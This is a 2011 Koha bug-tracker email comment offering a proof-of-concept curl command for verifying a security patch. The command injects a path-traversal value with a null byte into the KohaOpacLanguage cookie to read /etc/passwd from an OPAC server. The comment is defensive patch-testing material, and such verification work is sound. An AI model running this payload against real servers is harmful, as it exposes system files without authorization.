25 Nov
2011
25 Nov
'11
8:36 a.m.
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=6629 --- Comment #10 from Frère Sébastien Marie <semarie-koha@latrappe.fr> 2011-11-25 07:36:52 UTC --- In order to check the patch against the vulnerability, here a little poc using curl (a shell tool):
curl -v -b 'KohaOpacLanguage=../../../../../../../../etc/passwd%00' 'http://myopac.example.com/cgi-bin/koha/opac-main.pl'
A vulnerable result show the /etc/passwd file A non vulnerable result show 'opac-main' in the default Language (en). The test suppose a linux/BSD server. -- Configure bugmail: http://bugs.koha-community.org/bugzilla3/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the QA Contact for the bug. You are watching all bug changes.